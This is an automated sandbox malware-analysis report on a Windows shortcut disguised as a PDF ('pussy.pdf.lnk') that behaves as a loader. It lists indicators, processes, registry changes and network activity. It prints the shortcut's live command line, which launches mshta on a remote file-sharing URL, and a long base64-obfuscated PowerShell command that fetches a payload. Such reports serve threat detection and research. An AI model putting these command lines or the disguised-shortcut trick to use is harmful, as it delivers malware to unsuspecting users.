File name:

pussy.pdf.lnk

Full analysis: https://app.any.run/tasks/7bf7d10e-4604-4b8f-87fb-79bde80b88e0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 16:31:14
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

D9BC07E8CA61DAA947B6AB41CFCD549D

SHA1:

0818CAB1D714A5C0E7D44392A28785DD826300B2

SHA256:

EC52E869927D212B5662143D8F5E0064B465CED789A071CDC0A99B1241B804AD

SSDEEP:

24:8N84Zsx/Tff1efVKayWtC+/CWgFXO62fVTlP4HnLgMUPddS9dbEQPEZ/7QAMN5:8wTX1e3ztoFe62fVR2UPdo9aQPa7Q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4988)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 5376)
      • powershell.exe (PID: 4988)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 1672)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 5376)

    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Base64-obfuscated command line is found

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4988)

    • There is functionality for taking screenshot (YARA)

      • AcroCEF.exe (PID: 7212)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 1672)

    • Checks proxy server information

      • mshta.exe (PID: 1672)
      • slui.exe (PID: 7932)
      • powershell.exe (PID: 4988)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Disables trace logs

      • powershell.exe (PID: 4988)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Application launched itself

      • AcroCEF.exe (PID: 1568)
      • Acrobat.exe (PID: 6768)

    • Reads the software policy settings

      • slui.exe (PID: 976)
      • slui.exe (PID: 7932)

    • Creates files in the program directory

      • powershell.exe (PID: 4988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/MVSMFskQ/LO8xSpi2.62ec7135a2f4fdd6669b0320481d33d2')
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
27
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs slui.exe ucpdmgr.exe no specs conhost.exe no specs ucpdmgr.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
208"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1512 --field-trial-handle=1320,i,16749194963983569736,6060146968047278014,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
728"C:\WINDOWS\system32\cmd.exe" /c powershell.exe -w h -nop -ep un -E JABUAEIAZgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAOQA2ADgANQA0ADIAOAAyADQANwAyADYAMwA2AEMAMgBDADIAMAAyADQANgA3ADQAQwA3ADUAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAyADYAMwA2AEMAMgAwADIANAA2ADcANABDADcANQAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcAOAA0AEUANQAzADIAOAAyADQANwAyADYAMwA2AEMAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAyADYAMwA2AEMAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANAA5ADcAOQA1ADQAMgA4ADIANAA1ADQANAAyADYANgAyADkANwBCADIANAA1ADUANABEADQAQQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2AEQANgBBADYAQQAyADAANAAwADIAOAAzADEAMwA1ADMAOQAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADkAMwA3ADIAQwAzADEAMwAyADMANwAyAEMAMwAxADMANgAzADgAMgBDADMAMQAzADgAMwAyADIAQwAzADEAMwA3ADMAOQAyAEMAMwAxADMANAAzADgAMgBDADMAMQAzADgAMwA5ADIAQwAzADEAMwA4ADMANgAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADkAMwAxADIAQwAzADEAMwA5ADMANwAyADkAMgA5ADMAQgAyADQANgA3ADQAQwA3ADUAMgAwADMARAAyADAAMgA0ADUANQA0AEQANABBADIARQA0ADQANgBGADcANwA2AEUANgBDADYARgA2ADEANgA0ADQANAA2ADEANwA0ADYAMQAyADgAMgA0ADUANAA0ADIANgA2ADIAOQAzAEIANwAyADYANQA3ADQANwA1ADcAMgA2AEUAMgAwADIANAA2ADcANABDADcANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYARAA2AEEANgBBADIAOAAyADQANAA5ADYAMQA1ADkAMgA5ADcAQgAyADgAMgA0ADQAOQA2ADEANQA5ADIAMAA3AEMAMgA1ADcAQgAyADAANQBCADYAMwA2ADgANgAxADcAMgA1AEQAMgA4ADIANAA1AEYAMgAwADIARAAyADAAMwA4ADMAMQAyADkAMgAwADcARAAyADkAMgAwADIARAA2AEEANgBGADYAOQA2AEUAMgAwADIANwAyADcANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA0ADMANgBFADQAQgAyADgAMgA5ADcAQgAyADQANgBFADYAQQA1ADEAMgAwADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA1ADAANwAyADYARgA2ADcANwAyADYAMQA2AEQANAA0ADYAMQA3ADQANgAxADIAMAAyAEIAMgAwADIANwA1AEMAMgA3ADMAQgAyADQANgAyADYARQA3ADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAzAEIAMgA0ADQANgA3ADMANAA1ADIAMAAzAEQAMgAwADIANAA2ADIANgBFADcAMAAyADAAMgBCADIAMAAyADcANQBDADcAMwA2ADEANgBEADcAMAA2AEMANgA1ADIARQA3ADAANgA0ADYANgAyADcAMwBCADQAOQA2ADYAMgA4ADUANAA2ADUANwAzADcANAAyAEQANQAwADYAMQA3ADQANgA4ADIAMAAyADQANAA2ADcAMwA0ADUAMgA5ADcAQgA2ADkANgA5ADIAMAAyADQANAA2ADcAMwA0ADUAMwBCADcARAA0ADUANgBDADcAMwA2ADUANwBCADIAMAAyADQANwAxADcAOQA3ADcAMgAwADMARAAyADAANAA5ADcAOQA1ADQAMgAwADIAOAA2AEQANgBBADYAQQAyADAANAAwADIAOAAzADEAMwA4ADMANQAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADkAMwA3ADIAQwAzADEAMwA5ADMAMwAyAEMAMwAxADMAOQAzADYAMgBDADMAMQAzADMAMwA5ADIAQwAzADEAMwAyADMAOAAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA4ADMAMQAyAEMAMwAxADMAOAAzADMAMgBDADMAMQAzADkAMwAyADIAQwAzADEAMwA3ADMAOQAyAEMAMwAxADMAOAAzADcAMgBDADMAMQAzADgAMwAyADIAQwAzADEAMwA4ADMAMAAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADIAMwA3ADIAQwAzADEAMwA4ADMAMAAyAEMAMwAxADMAOQAzADIAMgBDADMAMQAzADkAMwAwADIAQwAzADEAMwAyADMAOAAyAEMAMwAxADMAOQAzADMAMgBDADMAMQAzADgAMwAxADIAQwAzADEAMwA4ADMAMwAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADkAMwA2ADIAQwAzADEAMwA3ADMAOAAyAEMAMwAxADMAOQAzADAAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA4ADMAOQAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADIAMwA3ADIAQwAzADEAMwA5ADMAMwAyAEMAMwAxADMAOAAzADEAMgBDADMAMQAzADgAMwAzADIAOQAyADkAMwBCADUAOQA2ADgANQA0ADIAMAAyADQANAA2ADcAMwA0ADUAMgAwADIANAA3ADEANwA5ADcANwAzAEIANgA5ADYAOQAyADAAMgA0ADQANgA3ADMANAA1ADMAQgA3AEQAMwBCADMAQgAzAEIAMgA0ADYARAA3ADkANgA0ADQANgA0ADYANABGADQARAA0ADEANAAzADUAQQAyADAAMwBEADIAMAAyADQANgBFADYAQQA1ADEAMgAwADIAQgAyADAAMgA3ADcAMAA3ADUANwA0ADcANAA3ADkAMgBFADYANQA3ADgANgA1ADIANwAzAEIANgA5ADYANgAyADgANQA0ADYANQA3ADMANwA0ADIARAA1ADAANgAxADcANAA2ADgAMgAwADIANAA2AEQANwA5ADYANAA0ADYANAA2ADQARgA0AEQANAAxADQAMwA1AEEAMgA5ADcAQgA3ADgANABFADUAMwAyADAAMgA0ADYARAA3ADkANgA0ADQANgA0ADYANABGADQARAA0ADEANAAzADUAQQA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADQANwAxADQAMwA1ADAANwAzADQARAA1ADAANwAyADcANwA2ADEANgBFADcAOQAzAEQANAA5ADcAOQA1ADQAMgA4ADYARAA2AEEANgBBADIAMAA0ADAAMgA4ADMAMQAzADgAMwA1ADIAQwAzADEAMwA5ADMANwAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwAzADMAOQAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADIAMwA4ADIAQwAzADEAMwA5ADMANwAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADkAMwAwADIAQwAzADEAMwA5ADMAMwAyAEMAMwAxADMAMgAzADcAMgBDADMAMQAzADkAMwA2ADIAQwAzADEAMwA4ADMANQAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA4ADMAMgAyAEMAMwAxADMAOAAzADMAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA4ADMANwAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA5ADMAOAAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADkAMwA3ADIAQwAzADIAMwAwADMAMgAyAEMAMwAxADMAMgAzADcAMgBDADMAMQAzADgAMwAyADIAQwAzADIAMwAwADMAMQAyAEMAMwAxADMAOAAzADIAMgA5ADIAOQAzAEIANQA5ADYAOAA1ADQAMgAwADIANAA2AEQANwA5ADYANAA0ADYANAA2ADQARgA0AEQANAAxADQAMwA1AEEAMgAwADIANAA3ADEANAAzADUAMAA3ADMANABEADUAMAA3ADIANwA3ADYAMQA2AEUANwA5ADMAQgA3ADgANABFADUAMwAyADAAMgA0ADYARAA3ADkANgA0ADQANgA0ADYANABGADQARAA0ADEANAAzADUAQQA3AEQAMwBCADMAQgAzAEIANwBEADQAMwA2AEUANABCADMAQgAnADsAJABVAE0ASgA9ACcAJwA7ACAAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAFQAQgBmAC4ATABlAG4AZwB0AGgAOwAkAGkAKwA9ADIAKQB7ACQAVQBNAEoAKwA9AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAFQAQgBmAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAyACkALAAxADYAKQApAH0AOwAgACYAIAAoACAAJABVAE0ASgBbADAALgAuADIAXQAgAC0AagBvAGkAbgAgACcAJwAgACkAIAAoACAAJABVAE0ASgBbADMALgAuACgAJABVAE0ASgAuAEwAZQBuAGcAdABoAC0AMQApAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApAA==C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
900"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/MVSMFskQ/LO8xSpi2.62ec7135a2f4fdd6669b0320481d33d2')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
976"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1188"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1320,i,16749194963983569736,6060146968047278014,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1532\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1568"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcrobat.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1672"C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/MVSMFskQ/LO8xSpi2.62ec7135a2f4fdd6669b0320481d33d2C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
2148"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1320,i,16749194963983569736,6060146968047278014,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
32 686
Read events
32 576
Write events
107
Delete events
3

Modification events

(PID) Process:(900) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(1672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4988) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(6768) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(6768) Acrobat.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\Acrobatbrokerserverdispatchercpp789
Operation:delete keyName:(default)
Value:
(PID) Process:(5352) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(5352) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(5352) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
Executable files
1
Suspicious files
206
Text files
17
Unknown types
0

Dropped files

PID
Process
Filename
Type
4988powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2bhqljzh.tip.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1672mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\123F791CC53894B533D644F4F58A822F_9CCEC9E3F2D7FDEEAD646FED8302DEE6binary
MD5:8F892FE87944CFD1F0C9969BA4245E83
SHA256:BF255145CD555877087A1491CF5FBB43C39C55BEDA35BA158091CB7D223D78F3
5376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10d5a1.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
1672mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\123F791CC53894B533D644F4F58A822F_9CCEC9E3F2D7FDEEAD646FED8302DEE6binary
MD5:710B793C63A2E875DC22635C8BBD76BA
SHA256:602E97BE88F2B8B2294BE55B16E561A1A591B6B0613625A76F4DE0D967899A69
900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\814694d7f1786cf4.customDestinations-msbinary
MD5:7432332B273AF3EB4C1EB9FC4DC781B3
SHA256:7411FEF0D0A891D7F83543AA4EFA7CFDB53706AA0D3A12FA7C0FFAF83DB3085B
900powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_30aagzuz.khd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
900powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:F3A9001EE56DEB6624781087E0A95B4C
SHA256:061479E9A25D98FB19173DFDAF8373B8C23F0C96A2C7A587EF91A62DBF65B34B
1672mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2Dbinary
MD5:BBC136E060A85689BDB61D7AF6E53C7A
SHA256:0B4C033E80F6883EB8A58DEA923A7796E00ED691478D383EE63C14E8DB275F52
1672mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771binary
MD5:3D8C4A1EA03BD7E86403AFADA57FCE3F
SHA256:C1875181273B49390108D0E93DD3AD22A752957943E1F2A7F8D16ED68614CD6E
900powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_im2tyewk.x5a.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
48
DNS requests
28
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1672
mshta.exe
GET
200
192.124.249.41:80
http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
unknown
whitelisted
1672
mshta.exe
GET
200
192.124.249.41:80
http://ocsp.godaddy.com//MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D
unknown
whitelisted
6544
svchost.exe
GET
200
